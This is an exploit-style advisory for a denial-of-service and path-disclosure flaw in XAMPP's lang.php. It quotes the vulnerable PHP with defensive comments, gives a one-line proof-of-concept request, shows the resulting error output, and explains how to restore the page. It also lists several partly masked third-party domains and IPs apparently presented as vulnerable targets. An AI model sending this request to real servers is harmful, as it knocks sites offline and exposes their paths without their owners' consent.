# Exploit Title: DoS and Full Path Disclosure in XAMPP
# Category:webapps
# Google Dork:?????
# Date: 11-1-2013
# Exploit Author: Dshellnoi Unix
# Vendor Homepage: http://www.apachefriends.org
# Software Link: http://sourceforge.net/projects/xampp/
# Version: 1.5.1, 1.5.4, 1.8.1, 1.8.0,
# Tested on: Windows
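#-----------------------------VULNERABILITY DESCRIPTION------------------------------------#
# The flaw is that lang.php does not properly validate the language value chosen by the admin.
# The application expects the URL query string to name a language and then redirects to the index page for that language.
# Whatever is sent in the URL is written to the file lang.tmp.
# Because the value is stored, it affects every later request: index.php builds an include path from it
# (see OUTPUT below), so an unknown value breaks the page for all visitors until a valid language is written
# again, and where PHP errors are displayed the warnings reveal the installation path.
# Restricting the value to the shipped language codes and turning off error display on exposed hosts removes both effects.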
#---------------------------------- VULN CODE----------------------------------------------#
<?php
// lang.php as quoted by the advisory (the vulnerable code, reproduced unchanged).
// It persists the requested language to lang.tmp; presumably index.php reads that file
// back on the next page load (index.php itself is not shown here).

// The return value of fopen() is not checked: if lang.tmp cannot be opened, $fp is false
// and the fwrite()/fclose() calls below run on an invalid handle.
$fp=fopen("lang.tmp","w");
// basename() only strips directory components from the raw query string. It does not
// restrict the value to a known language, so any string the client sends is persisted.
// The OUTPUT section shows index.php using the stored value as "lang/<value>.php" in include().
// Defensive fix: write the value only when it strictly matches a fixed allowlist of the
// language codes that ship with the application, and fall back to a default otherwise.
fwrite($fp,basename($_SERVER['QUERY_STRING']));
fclose($fp);
// The redirect is unconditional; no authentication or request-origin check is visible in this snippet.
header("Location: index.php");
?>
#--------------------------POC-EXPLOIT-------------------------------#
# Correct request : GET http| https ://domain/xampp/lang.php?en
#
# Exploit request : GET http| https ://domain/xampp/lang.php?KNOCKOUT+BY+EVILCODETEAM
#
#---------------------------OUTPUT---------------------------------------#
Warning: include(lang/KNOCKOUT+BY+EVILCODETEAM.php) [function.include]: failed to open stream: No such file or directory in C:\apachefriends\xampp\htdocs\xampp\index.php on line 13
Warning: include() [function.include]: Failed opening 'lang/KNOCKOUT+BY+EVILCODETEAM.php' for inclusion (include_path='.;C:\apachefriends\xampp\php\pear\') in C:\apachefriends\xampp\htdocs\xampp\index.php on line 13
#-----------------------------DOMAINS POC-----------------------------------------------#
http://simeXp.mic.gov.py/xampp/
http://1X63.22.69.5/xampp/
http://paXul.igl.uni-freiburg.de/xampp/
http://www.suckhoeXvang.vn/xampp/
http://katsXuka.mXine.nu
http://map.mckXonnichiwa.com/xampp
http://soXXu001.com/xampp/
#---------------------------------RESTORE-DOS-------------------------------------------#
GET http| https ://domain/xampp/lang.php?en
#Thanks to :Ivan sanchez, Juan carlos garcia, Luisfer :)